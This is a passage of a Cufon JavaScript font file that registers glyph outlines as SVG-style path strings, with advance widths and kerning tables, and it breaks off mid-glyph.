Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"113,-92r0,92r-50,0r0,-92r-73,-164r55,0r44,110r44,-110r55,0xm102,-289r0,-41r36,0r0,41r-36,0xm40,-289r0,-41r36,0r0,41r-36,0","w":177},{"d":"186,-128v0,-65,-43,-91,-114,-84r0,168v73,6,114,-14,114,-84xm237,-127v0,79,-40,130,-129,127r-87,0r0,-256r86,0v89,-2,130,46,130,129","w":246,"k":{"\u201e":20,"\u201a":20,"\u00c5":6,"Y":6,"W":6,"V":6,"A":6,"-":-11}},{"d":"75,0r-45,0r0,-48r45,0r0,48","w":104},{"w":209},{"d":"45,-122r210,0r0,30r-210,0r0,-30","w":299},{"d":"116,-154v-29,0,-53,27,-53,56v-1,32,24,58,55,58v31,0,57,-26,57,-57v0,-32,-27,-57,-59,-57xm221,-96v4,82,-97,129,-160,81r0,78r-44,0r0,-256r44,0r0,16v16,-13,34,-20,60,-21v63,1,97,42,100,102","w":231},{"d":"71,-226r0,-42r38,0r0,42r-38,0"},{"d":"126,-117r-32,117r-30,0r-67,-193r49,0r31,111r34,-111r33,0r33,111r31,-111r49,0r-68,193r-29,0","w":253,"k":{"\u201e":21,"\u201a":21,"\u2019":-7,"\u2018":-17,"\u201d":-7,"\u201c":-17,".":26,",":26}},{"d":"22,-187v12,-1,16,-7,15,-20r-15,0r0,-49r45,0v0,47,7,98,-45,95r0,-26xm89,-187v11,-2,15,-7,15,-20r-15,0r0,-49r45,0v0,47,7,98,-45,95r0,-26","w":152},{"d":"191,-128v0,-65,-43,-91,-114,-84r0,63r53,0r0,42r-53,0r0,63v73,6,114,-14,114,-84xm242,-127v0,79,-40,130,-129,127r-87,0r0,-107r-26,0r0,-42r26,0r0,-107r86,0v89,-2,130,46,130,129","w":251,"k":{"\u201e":20,"\u201a":20,"\u00c5":6,"Y":6,"W":6,"V":6,"A":6,"-":-11}},{"d":"22,0r0,-256r50,0r0,256r-50,0xm-5,-280r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":93},{"d":"159,0r-138,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,63r88,0r0,45xm103,-289r0,-41r36,0r0,41r-36,0xm41,-289r0,-41r36,0r0,41r-36,0"},{"d":"112,-151v85,20,55,156,-29,156v-47,0,-78,-35,-77,-84r46,-1v-2,23,10,40,30,40v20,0,33,-14,33,-34v0,-38,-70,-39,-87,-64v-33,-48,-2,-123,59,-123v44,0,67,31,70,74v-14,-2,-35,4,-45,-2v0,-16,-11,-27,-27,-28v-24,-1,-35,30,-20,47v4,7,34,15,47,19xm131,50v1,42,-58,37,-91,26r0,-21v21,5,58,19,64,-5v0,-15,-16,-14,-33,-14r0,-36r16,0r0,17v27,-1,44,8,44,33","w":172},{"d":"9,-97v-4,-86,98,-129,164,-82v17,13,28,31,34,54r-48,0v-20,-48,-110,-33,-104,28v-7,58,89,79,104,26r48,0v-11,44,-45,76,-96,76v-61,0,-100,-40,-102,-102","w":218},{"d":"22,20v12,-1,16,-7,15,-20r-15,0r0,-48r45,0v0,46,7,97,-45,94r0,-26","w":85,"k":{"\uf002":6,"\uf001":6,"\u0152":20,"\u00d8":20,"\u00c6":-20,"\u00c5":-13,"y":13,"w":21,"f":6,"Y":40,"W":44,"V":60,"T":36,"O":20,"J":-7,"G":13,"C":20,"A":-13}},{"d":"137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-256r43,0r98,256r-54,0r-20,-54r-95,0xm134,-280r-23,0r-52,-62r39,0","w":216},{"d":"104,5v-59,-3,-83,-32,-83,-99r0,-162r50,0r0,148v1,37,2,61,33,61v31,0,31,-23,32,-61r0,-148r50,0v-7,108,35,266,-82,261xm130,-280r-23,0r-52,-62r39,0","w":207},{"d":"0,-80r0,-34r360,0r0,34r-360,0","w":360},{"d":"17,33r-25,0r84,-289r24,0","w":100},{"d":"149,-256r0,45r-49,0r0,211r-50,0r0,-211r-48,0r0,-45r147,0","w":150,"k":{"\u201e":20,"\u201a":20,"\u203a":20,"\u2039":33,"\u0153":16,"\u00bb":20,"\u00ab":33,"\u00f8":16,"\u00e6":16,"\u00c5":15,"y":16,"w":16,"u":16,"s":15,"r":10,"o":16,"e":16,"c":16,"a":16,"C":6,"A":15,";":23,":":23,".":33,"-":20,",":33}},{"d":"198,-294r35,0r0,19r-19,0r-104,282r-15,0r-55,-153r-23,9r-5,-17r53,-19r44,121","w":232},{"d":"159,0r-138,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,63r88,0r0,45xm116,-280r-23,0r-52,-62r39,0"},{"d":"162,-118v-8,-51,-96,-52,-105,0r105,0xm55,-82v0,49,81,59,100,20r48,0v-14,38,-45,68,-93,67v-61,-2,-101,-40,-101,-102v0,-60,40,-102,99,-102v65,0,105,43,102,117r-155,0","w":218,"k":{"x":6}},{"d":"162,-118v-8,-51,-96,-52,-105,0r105,0xm55,-82v0,49,81,59,100,20r48,0v-14,38,-45,68,-93,67v-61,-2,-101,-40,-101,-102v0,-60,40,-102,99,-102v65,0,105,43,102,117r-155,0xm135,-218r-23,0r-52,-62r39,0","w":218},{"d":"52,-104v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24","w":104},{"d":"22,-187v12,-1,15,-6,15,-20r-15,0r0,-49r45,0v0,47,7,98,-45,95r0,-26","w":85},{"d":"126,-116v-15,83,19,209,-104,189r4,-45v32,0,42,-3,45,-36r9,-108r-43,0r4,-41r43,0v1,-70,17,-113,96,-104r-3,45v-43,-6,-46,21,-47,59r46,0r-4,41r-46,0","w":209},{"d":"101,-153r-43,56r43,57r-35,0r-44,-57r44,-56r35,0","w":127,"k":{"\u00c6":-7,"Y":26,"X":13,"W":20,"V":20,"T":20,"J":-7}},{"d":"107,-261v57,0,104,61,73,115v-22,39,-69,68,-101,100r109,0r0,46r-169,0r0,-48v37,-37,83,-69,113,-111v17,-23,3,-57,-27,-56v-22,0,-33,18,-32,43v-16,-1,-36,2,-50,-1v-1,-51,33,-88,84,-88","w":209},{"d":"82,-229v-23,0,-42,16,-41,40v1,25,15,41,41,41v25,0,41,-17,41,-42v0,-22,-18,-39,-41,-39xm82,-117v-46,0,-76,-29,-76,-72v0,-42,31,-71,75,-71v44,0,77,27,77,70v0,46,-30,73,-76,73","w":164},{"d":"151,0r-130,0r0,-256r50,0r0,211r80,0r0,45","w":158,"k":{"\u2039":6,"\u2019":48,"\u2018":46,"\u201d":48,"\u201c":46,"\u0153":6,"\u0152":13,"\u00ab":6,"\u00f8":6,"\u00e6":6,"\u00d8":13,"\u00c5":-13,"y":13,"u":6,"o":6,"e":6,"a":6,"Y":20,"W":20,"V":23,"U":6,"T":13,"O":13,"A":-13,"-":6}},{"d":"25,0r0,-100r-25,17r0,-39r25,-18r0,-116r44,0r0,100r25,-17r0,38r-25,18r0,117r-44,0","w":94},{"d":"89,-248r-68,144r68,145r68,-145xm89,-291r88,187r-88,188r-88,-188","w":177},{"d":"94,-261r26,0r-154,266r-26,0","w":60},{"d":"105,-218v-21,0,-33,4,-32,25r32,0r0,40r-33,0r0,153r-43,0r0,-153r-23,0r0,-40r21,0v-2,-50,26,-68,78,-66r0,41","w":106,"k":{"\u201e":6,"\u201a":6,"\u2019":-15,"\u2018":-25,"\u201d":-15,"\u201c":-25,"y":-7,"w":-7,"t":-7,".":13,",":13}},{"d":"125,-150r-16,45r45,0r16,-45r-45,0xm129,-257r34,0r-27,77r44,0r27,-77r33,0r-27,77r52,0r-11,30r-51,0r-16,45r54,0r-11,30r-54,0r-27,76r-34,0r28,-76r-44,0r-28,76r-34,0r28,-76r-53,0r11,-30r52,0r16,-45r-55,0r10,-30r56,0","w":276},{"d":"20,0r0,-193r44,0r0,193r-44,0xm-10,-218r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":84},{"d":"16,-66v0,-69,92,-111,117,-46v4,-31,20,-94,-15,-99v-19,-3,-55,41,-63,5v1,-18,26,-30,49,-29v47,1,70,49,70,102v0,68,-34,136,-93,137v-39,1,-65,-32,-65,-70xm81,-7v30,0,43,-44,43,-82v0,-25,-7,-42,-28,-42v-30,0,-43,43,-43,82v0,24,7,42,28,42","w":188},{"d":"112,-128v-12,54,65,77,72,26r29,0v-1,32,-29,52,-63,52v-43,0,-70,-32,-70,-77v0,-64,64,-102,114,-67v12,8,17,21,18,35r-29,0v-2,-17,-16,-27,-34,-27v-27,1,-37,27,-37,58xm261,-128v0,-67,-44,-111,-111,-111v-68,0,-111,46,-111,111v0,65,45,110,111,110v66,0,111,-44,111,-110xm20,-128v0,-77,51,-130,130,-130v79,0,130,52,130,130v0,78,-53,130,-130,130v-77,0,-130,-53,-130,-130","w":299},{"d":"105,-90r-51,90r-57,0r82,-129r-80,-127r57,0r49,89r50,-89r56,0r-79,127r81,129r-56,0","w":210,"k":{"\u201e":-13,"\u201a":-13,"\u203a":13,"\u2039":20,"\u2018":13,"\u201c":13,"\u0152":13,"\u00bb":13,"\u00ab":20,"\u00d8":13,"e":6,"O":13,"C":13,"-":18}},{"d":"104,-38v60,0,37,-95,42,-155r44,0r0,193r-44,0r0,-21v-13,16,-26,26,-52,26v-50,0,-76,-33,-75,-86r0,-112r45,0v6,59,-21,155,40,155xm118,-227r0,-41r36,0r0,41r-36,0xm56,-227r0,-41r36,0r0,41r-36,0","w":209},{"d":"110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100xm142,-218r-23,0r-52,-62r39,0","w":231},{"d":"133,-150v-49,-23,-98,31,-71,83xm8,-97v-1,-79,84,-126,153,-88r28,-33r27,21r-29,35v53,59,9,173,-78,167v-22,-1,-36,-5,-51,-14r-28,34r-26,-22r29,-34v-14,-18,-25,-37,-25,-66xm87,-44v52,20,95,-31,70,-83","w":219,"k":{"\u2018":6,"\u201c":6,"x":6,".":6,"-":-7,",":6}},{"d":"212,-213r21,18r-30,37r52,0r0,29r-71,0r-34,44r105,0r0,28r-124,0r-44,55r-21,-17r29,-38r-50,0r0,-28r69,0r35,-44r-104,0r0,-29r123,0","w":299},{"d":"115,5v-52,0,-87,-34,-88,-85r-25,0r5,-31r19,0r0,-29r-23,0r5,-31r18,0v-7,-80,93,-115,150,-70v16,13,25,31,28,54r-49,0v-11,-43,-85,-35,-78,16r66,0r-5,31r-62,0r0,29r58,0r-5,31r-52,0v2,27,11,39,38,39v24,-1,35,-10,39,-32v16,1,36,-2,50,1v1,45,-42,77,-89,77","w":209},{"d":"110,-155v-32,-1,-55,24,-55,57v0,36,20,58,55,58v34,0,54,-25,54,-59v1,-32,-23,-56,-54,-56xm109,5v-62,0,-101,-42,-101,-103v0,-60,41,-101,100,-101v61,0,103,40,103,100v0,64,-40,104,-102,104xm58,-218r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":219},{"d":"211,-82v-2,49,80,60,99,21r49,0v-16,39,-46,66,-96,67v-31,0,-49,-14,-59,-36r0,30r-34,0r0,-30v-10,22,-28,34,-59,34v-59,1,-105,-44,-103,-102v2,-60,38,-100,100,-100v32,0,50,11,62,34r0,-29r34,0r0,29v12,-20,33,-35,64,-34v61,0,101,49,97,116r-154,0xm317,-118v-8,-49,-97,-52,-105,0r105,0xm110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58","w":373,"k":{"x":6}},{"d":"12,-127v0,-51,31,-90,75,-100r0,-38r39,0r0,37v39,8,63,35,71,74r-47,0v-19,-61,-92,-29,-92,27v0,32,19,60,49,60v22,-1,37,-15,43,-34r47,0v-8,39,-33,66,-71,75r0,40r-39,0r0,-40v-41,-11,-75,-51,-75,-101","w":209},{"d":"237,5v-38,0,-64,-25,-64,-63v0,-37,26,-63,64,-63v37,0,63,26,63,63v0,38,-26,63,-63,63xm237,-88v-15,-1,-30,15,-30,30v0,15,15,31,30,30v15,0,29,-15,29,-30v0,-15,-14,-30,-29,-30xm79,-227v-16,0,-30,14,-30,29v0,15,14,29,30,29v16,0,29,-13,29,-29v0,-16,-13,-29,-29,-29xm79,-135v-37,0,-63,-26,-63,-63v0,-37,26,-63,63,-63v37,0,63,26,63,63v0,37,-26,63,-63,63xm388,5v-37,0,-63,-26,-63,-63v0,-37,26,-63,63,-63v37,0,63,24,63,63v0,39,-26,63,-63,63xm388,-88v-15,0,-29,14,-29,30v0,16,14,30,29,30v15,0,30,-15,30,-30v0,-15,-15,-30,-30,-30xm212,-261r29,0r-137,266r-28,0","w":465},{"d":"159,0r-138,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,63r88,0r0,45xm64,-280r36,-62r39,0r-52,62r-23,0"},{"d":"101,-113v12,19,19,50,7,71v32,7,53,-23,44,-56r45,0v11,69,-34,110,-108,100r-73,-2r0,-43r41,0v19,-16,7,-55,-8,-70r-38,0r0,-41r18,0v-27,-78,71,-139,135,-89v15,12,24,28,28,49r-52,0v-7,-33,-68,-26,-65,10v1,11,4,20,9,30r70,0r0,41r-53,0","w":209},{"d":"118,-154v-31,0,-56,27,-55,58v0,30,23,56,53,56v33,0,59,-25,59,-57v0,-31,-27,-57,-57,-57xm221,-97v6,84,-98,131,-160,81r0,16r-44,0r0,-256r44,0r0,78v15,-13,34,-20,61,-20v60,0,95,42,99,101","w":231},{"d":"259,-145v-1,52,-19,80,-49,108r53,0r0,37r-105,0r0,-40v34,-20,56,-54,57,-105v0,-47,-31,-83,-77,-83v-47,-1,-78,36,-77,85v0,48,24,84,57,103r0,40r-106,0r0,-37r54,0v-29,-27,-48,-56,-49,-105v-1,-72,49,-124,121,-124v70,0,122,52,121,121","w":275},{"d":"64,-218r36,-62r39,0r-52,62r-23,0"},{"d":"123,-210r-67,173r133,0xm100,-259r45,0r101,259r-247,0","w":245},{"d":"67,-235v-11,2,-15,7,-15,20r15,0r0,49r-45,0v0,-47,-7,-98,45,-95r0,26","w":85,"k":{"\uf002":-7,"\uf001":-7,"\u00c6":50,"\u00c5":28,"y":-13,"w":-13,"f":-7,"Y":-18,"W":-10,"V":-13,"T":-7,"J":48,"A":28}},{"d":"11,-259r225,0r0,40r-162,0r114,120r-117,128r172,0r0,40r-237,0r0,-28r125,-138r-120,-127r0,-35","w":249},{"d":"41,-236r0,-26r98,0r0,26r-98,0"},{"d":"83,0r-45,0r0,-48r45,0r0,48xm202,0r-45,0r0,-48r45,0r0,48xm323,0r-45,0r0,-48r45,0r0,48","w":360},{"d":"143,-209v-42,0,-81,35,-80,79v2,50,32,81,79,83v44,2,79,-38,79,-83v0,-43,-36,-79,-78,-79xm142,5v-81,0,-132,-53,-132,-133v0,-81,53,-133,133,-133v77,0,130,53,130,131v0,81,-51,135,-131,135xm168,-280r-23,0r-52,-62r39,0","w":283},{"d":"127,-19v-13,28,-68,34,-86,6r-17,89r-40,0r52,-266r40,0r-24,130v-4,40,48,44,66,19v22,-31,28,-102,39,-149r40,0r-29,153v-1,11,7,13,18,12r-6,27v-21,7,-57,6,-53,-21","w":212},{"d":"17,-78v0,-46,61,-64,60,-113r45,0v4,55,-49,63,-54,110v-3,22,13,35,34,36v19,0,32,-17,31,-38r47,0v0,48,-33,83,-81,83v-47,0,-82,-33,-82,-78xm122,-261r0,49r-45,0r0,-49r45,0","w":183},{"d":"15,20v11,-2,15,-7,15,-20r-15,0r0,-48r45,0v0,46,7,97,-45,94r0,-26xm82,20v11,-2,15,-7,15,-20r-15,0r0,-48r45,0v0,46,7,97,-45,94r0,-26","w":152,"k":{"\uf002":6,"\uf001":6,"\u0152":20,"\u00d8":20,"\u00c6":-20,"\u00c5":-13,"y":13,"w":21,"f":6,"Y":40,"W":44,"V":60,"T":36,"O":20,"J":-7,"G":13,"C":20,"A":-13}},{"d":"106,-82v-28,0,-52,-24,-52,-52v0,-28,24,-52,52,-52v28,0,52,24,52,52v0,28,-24,52,-52,52","w":212},{"d":"90,-283v-12,0,-22,10,-22,23v0,12,9,23,22,22v13,0,23,-10,23,-22v0,-12,-11,-23,-23,-23xm90,-215v-25,0,-45,-21,-45,-46v0,-25,20,-45,45,-45v25,0,45,20,45,45v0,25,-20,46,-45,46"},{"d":"143,-209v-42,0,-81,35,-80,79v2,50,32,81,79,83v44,2,79,-38,79,-83v0,-43,-36,-79,-78,-79xm142,5v-81,0,-132,-53,-132,-133v0,-81,53,-133,133,-133v77,0,130,53,130,131v0,81,-51,135,-131,135xm123,-327v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39","w":283},{"d":"137,0r-48,0r0,-218r-45,0r0,-38r93,0r0,256","w":209},{"d":"142,0r0,-68r-74,0r-33,68r-57,0r137,-256r164,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,63r88,0r0,45r-137,0xm142,-116r0,-91r-7,0r-44,91r51,0","w":299,"k":{"\u2019":16,"\u2018":6,"\u201d":16,"\u201c":6,"-":-7}},{"d":"136,-57v5,55,-75,83,-109,43v-11,-12,-18,-29,-19,-50v13,2,32,-4,41,2v-4,32,46,40,46,8v0,-44,-78,-25,-78,-86v0,-49,65,-77,99,-43v10,10,16,23,17,41v-13,-1,-30,2,-41,-1v0,-12,-6,-20,-18,-19v-10,0,-17,8,-17,18v13,33,88,31,79,87xm118,50v1,42,-58,37,-91,26r0,-21v21,5,58,19,64,-5v0,-15,-16,-14,-33,-14r0,-36r16,0r0,17v27,-1,44,8,44,33","w":146},{"d":"221,-96v4,82,-98,129,-160,81r0,78r-44,0r0,-319r44,0r0,79v16,-13,34,-20,60,-21v63,1,97,42,100,102xm116,-154v-29,0,-53,27,-53,56v-1,32,24,58,55,58v32,0,57,-26,57,-57v0,-32,-27,-57,-59,-57","w":231},{"d":"134,5v-36,0,-59,-19,-70,-46r0,41r-44,0v9,-103,-37,-260,77,-260v65,0,102,78,56,117v33,9,56,31,56,70v1,42,-32,79,-75,78xm165,-72v0,-35,-31,-41,-70,-40r0,-38v23,1,36,-15,36,-37v0,-20,-14,-37,-33,-36v-58,3,-26,101,-34,155r24,0v3,48,78,41,77,-4","w":216,"k":{"\u2019":23,"\u2018":20,"\u201d":23,"\u201c":20,"-":-10}},{"d":"45,-32r210,0r0,30r-210,0r0,-30xm135,-212r30,0r0,59r90,0r0,29r-90,0r0,58r-30,0r0,-58r-90,0r0,-29r90,0r0,-59","w":299},{"d":"136,-57v5,55,-75,83,-109,43v-11,-12,-18,-29,-19,-50v13,2,32,-4,41,2v-4,32,46,40,46,8v0,-44,-78,-25,-78,-86v0,-49,65,-77,99,-43v10,10,16,23,17,41v-13,-1,-30,2,-41,-1v0,-12,-6,-20,-18,-19v-10,0,-17,8,-17,18v13,33,88,31,79,87xm21,-280r22,0r30,37r29,-37r23,0r-33,62r-38,0","w":146},{"d":"259,-146v49,-3,66,53,28,84r-45,36r68,0r0,26r-106,0r0,-27v23,-20,52,-38,71,-62v11,-14,0,-31,-17,-31v-13,0,-22,8,-20,23r-32,0v0,-30,23,-47,53,-49xm226,-261r26,0r-154,266r-26,0xm86,-113r-30,0r0,-122r-28,0r0,-21r58,0r0,143","w":323},{"d":"11,-130v-2,-103,113,-164,202,-111v20,12,36,34,49,61r-61,0v-13,-18,-32,-30,-61,-30v-47,0,-75,34,-77,81v-1,44,33,84,77,83v27,0,47,-11,59,-27r61,0v-22,47,-57,78,-119,78v-79,0,-127,-53,-130,-135xm89,-342r22,0r30,37r29,-37r23,0r-33,62r-38,0","w":270},{"d":"11,-130v-2,-103,113,-164,202,-111v20,12,36,34,49,61r-61,0v-13,-18,-32,-30,-61,-30v-47,0,-75,34,-77,81v-1,44,33,84,77,83v27,0,47,-11,59,-27r61,0v-22,47,-57,78,-119,78v-79,0,-127,-53,-130,-135","w":270,"k":{"\u2019":-10,"\u201d":-10,"-":-8}},{"d":"71,-209r81,81r81,-81r20,21r-81,81r81,80r-20,21r-81,-81r-81,81r-21,-21r81,-80r-81,-81","w":299},{"d":"95,-153r35,0r43,56r-43,57r-35,0r43,-57xm27,-153r35,0r43,56r-43,57r-35,0r43,-57","w":195,"k":{"\u00c5":13,"Y":40,"X":20,"W":20,"V":40,"T":33,"J":-13,"A":13}},{"d":"103,-227r0,-41r36,0r0,41r-36,0xm41,-227r0,-41r36,0r0,41r-36,0"},{"d":"142,-257r30,0r25,64r23,-64r30,0r0,96r-20,0r0,-76r-28,76r-10,0r-30,-76r0,76r-20,0r0,-96xm40,-257r82,0r0,17r-30,0r0,79r-23,0r0,-79r-29,0r0,-17","w":299},{"d":"143,-209v-42,0,-81,35,-80,79v2,50,32,81,79,83v44,2,79,-38,79,-83v0,-43,-36,-79,-78,-79xm142,5v-81,0,-132,-53,-132,-133v0,-81,53,-133,133,-133v77,0,130,53,130,131v0,81,-51,135,-131,135","w":283,"k":{"\u201e":20,"\u201a":20,"\u2019":6,"\u201d":6,"\u00c5":6,"Y":6,"X":13,"V":6,"A":6,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"104,-38v60,0,37,-95,42,-155r44,0r0,193r-44,0r0,-21v-13,16,-26,26,-52,26v-50,0,-76,-33,-75,-86r0,-112r45,0v6,59,-21,155,40,155xm131,-218r-23,0r-52,-62r39,0","w":209},{"d":"109,-268v-9,0,-19,10,-19,19v0,9,9,20,19,19v10,1,19,-10,19,-19v0,-9,-10,-19,-19,-19xm109,-208v-21,0,-40,-20,-40,-41v0,-21,19,-40,40,-40v21,0,40,18,40,40v0,22,-18,41,-40,41xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100xm110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58","w":231},{"d":"115,5v-52,0,-87,-34,-88,-85r-25,0r5,-31r19,0r0,-29r-23,0r5,-31r18,0v-7,-80,93,-115,150,-70v16,13,25,31,28,54r-49,0v-11,-43,-85,-35,-78,16r66,0r-5,31r-62,0r0,29r58,0r-5,31r-52,0v2,27,11,39,38,39v24,-1,35,-10,39,-32v16,1,36,-2,50,1v1,45,-42,77,-89,77","w":209},{"d":"69,41r0,-66r-59,0r0,-33r59,0r0,-98r-59,0r0,-33r59,0r0,-67r42,0r0,67r59,0r0,33r-59,0r0,98r59,0r0,33r-59,0r0,66r-42,0"},{"d":"104,5v-59,-3,-83,-32,-83,-99r0,-162r50,0r0,148v1,37,2,61,33,61v31,0,31,-23,32,-61r0,-148r50,0v-7,108,35,266,-82,261xm78,-280r36,-62r39,0r-52,62r-23,0","w":207},{"d":"177,-201v-70,-35,-148,46,-101,116xm103,-57v68,42,155,-46,103,-119xm273,-130v6,108,-119,169,-204,113r-40,45r-29,-26r40,-46v-18,-23,-30,-48,-30,-87v0,-102,115,-162,200,-110r37,-42r30,26r-36,42v20,22,30,48,32,85","w":283,"k":{"\u201e":20,"\u201a":20,"\u2019":6,"\u201d":6,"\u00c5":6,"Y":6,"X":13,"V":6,"A":6,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"15,-252r29,0r0,97r-29,0r0,-97","w":58},{"d":"20,0r0,-193r44,0r0,193r-44,0","w":84},{"d":"52,-104v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24","w":104},{"d":"69,-99v-33,-2,-57,-19,-56,-53v10,2,26,-3,32,2v0,14,9,23,23,23v15,0,26,-11,26,-26v0,-19,-15,-25,-36,-24r0,-25v27,7,32,-30,10,-30v-9,0,-13,6,-13,15r-30,0v0,-24,19,-42,45,-42v37,0,58,50,26,67v50,15,28,97,-27,93","w":137},{"d":"20,0r0,-193r44,0r0,193r-44,0xm55,-227r0,-41r36,0r0,41r-36,0xm-7,-227r0,-41r36,0r0,41r-36,0","w":84},{"d":"71,-265v18,0,49,19,54,-5r18,0v-4,41,-37,45,-73,32v-9,0,-13,4,-15,12r-18,0v3,-22,13,-39,34,-39"},{"d":"211,-82v-2,49,80,60,99,21r49,0v-14,37,-47,67,-94,67v-36,0,-61,-15,-78,-37v-18,21,-42,36,-78,36v-61,0,-97,-42,-100,-103v-6,-96,129,-133,179,-64v53,-71,193,-31,177,80r-154,0xm317,-118v-8,-49,-97,-52,-105,0r105,0xm110,-155v-32,-1,-55,24,-55,57v0,35,21,57,55,58v34,1,54,-25,54,-59v0,-31,-23,-56,-54,-56","w":373,"k":{"x":6}},{"d":"90,-159r-32,44r-25,-18r34,-43r-50,-14r9,-30r49,16r0,-52r30,0r0,52r48,-16r10,30r-50,13r33,44r-25,19"},{"d":"-4,-193r48,0r47,135r52,-135r47,0r-105,256r-46,0r27,-68xm66,-218r36,-62r39,0r-52,62r-23,0","w":184},{"d":"143,-209v-42,0,-81,35,-80,79v2,50,32,81,79,83v44,2,79,-38,79,-83v0,-43,-36,-79,-78,-79xm142,5v-81,0,-132,-53,-132,-133v0,-81,53,-133,133,-133v77,0,130,53,130,131v0,81,-51,135,-131,135xm90,-280r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":283},{"d":"104,5v-59,-3,-83,-32,-83,-99r0,-162r50,0r0,148v1,37,2,61,33,61v31,0,31,-23,32,-61r0,-148r50,0v-7,108,35,266,-82,261xm52,-280r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":207},{"d":"38,-218r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0"},{"d":"22,0r0,-256r50,0r0,256r-50,0","w":93},{"d":"21,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,108r-50,0xm283,-154v-69,-2,-41,92,-47,154r-45,0r0,-193r42,0r0,22v13,-15,26,-24,50,-25r0,42","w":281},{"d":"104,5v-59,-3,-83,-32,-83,-99r0,-162r50,0r0,148v1,37,2,61,33,61v31,0,31,-23,32,-61r0,-148r50,0v-7,108,35,266,-82,261","w":207},{"d":"106,-153v-62,0,-37,94,-42,153r-44,0r0,-193r44,0r0,22v13,-16,26,-26,52,-26v92,-3,74,106,75,197r-45,0v-6,-58,21,-153,-40,-153","w":209,"k":{"\u2019":6,"\u2018":6,"\u201d":6,"\u201c":6}},{"d":"63,-148v-23,13,-14,40,14,47r39,20v20,-10,16,-37,-7,-43xm140,-66v43,35,10,111,-49,107v-43,-3,-70,-22,-71,-64r44,0v-3,32,52,37,52,6v-13,-41,-108,-41,-107,-100v1,-23,13,-38,31,-47v-39,-32,-8,-97,49,-97v40,0,66,22,66,60r-41,0v-1,-16,-9,-24,-26,-24v-19,0,-31,19,-16,31v31,23,99,30,99,82v0,24,-12,39,-31,46"},{"d":"83,33r-83,-289r24,0r84,289r-25,0","w":100},{"d":"137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-256r43,0r98,256r-54,0r-20,-54r-95,0xm82,-280r36,-62r39,0r-52,62r-23,0","w":216},{"d":"203,-255r-32,70r26,0r0,30r-40,0r-14,30r54,0r0,31r-69,0r0,94r-48,0r0,-94r-69,0r0,-31r54,0r-13,-30r-41,0r0,-30r27,0r-31,-70r51,0r47,112r46,-112r52,0","w":209},{"d":"104,-38v60,0,37,-95,42,-155r44,0r0,193r-44,0r0,-21v-13,16,-26,26,-52,26v-50,0,-76,-33,-75,-86r0,-112r45,0v6,59,-21,155,40,155xm53,-218r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":209},{"d":"71,-104r0,104r-50,0r0,-256r50,0r0,104r83,0r0,-104r50,0r0,256r-50,0r0,-104r-83,0","w":225,"k":{".":6,",":6}},{"d":"6,0r0,-41r86,-111r-79,0r0,-41r128,0r0,48r-81,102r86,0r0,43r-140,0xm24,-280r22,0r30,37r29,-37r23,0r-33,62r-38,0","w":151},{"d":"162,-118v-8,-51,-96,-52,-105,0r105,0xm55,-82v0,49,81,59,100,20r48,0v-14,38,-45,68,-93,67v-61,-2,-101,-40,-101,-102v0,-60,40,-102,99,-102v65,0,105,43,102,117r-155,0xm57,-218r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0","w":218},{"d":"159,-87v0,-28,-21,-48,-51,-48v-27,0,-48,22,-48,49v0,30,20,51,50,51v30,0,50,-20,49,-52xm97,-220r-21,-10r14,-28r45,25r50,-18r12,27r-36,14v25,29,41,65,41,115v0,58,-37,100,-93,100v-55,0,-89,-36,-91,-90v-3,-67,77,-110,134,-74v-8,-16,-15,-28,-27,-39r-52,18r-11,-27","w":218},{"d":"159,0r-138,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,63r88,0r0,45xm38,-280r33,-62r38,0r33,62r-23,0r-29,-38r-30,38r-22,0"},{"d":"107,-117r0,41r-91,0r0,-41r91,0","w":122},{"d":"135,-215r30,0r0,93r90,0r0,29r-90,0r0,93r-30,0r0,-93r-90,0r0,-29r90,0r0,-93","w":299},{"d":"169,-153r-43,56r43,57r-35,0r-43,-57r43,-56r35,0xm101,-153r-43,56r43,57r-35,0r-44,-57r44,-56r35,0","w":195,"k":{"\u00c6":-7,"Y":26,"X":13,"W":20,"V":20,"T":20,"J":-7}},{"d":"105,-130v-23,0,-42,19,-42,43v0,24,18,46,41,46v24,0,42,-19,42,-44v0,-26,-17,-45,-41,-45xm104,5v-64,0,-108,-61,-82,-125v17,-43,59,-95,84,-136r52,0r-58,88v53,-16,98,33,95,83v-3,53,-35,90,-91,90","w":209},{"d":"166,0r-44,0r0,-256r44,0r0,256xm105,-218v-21,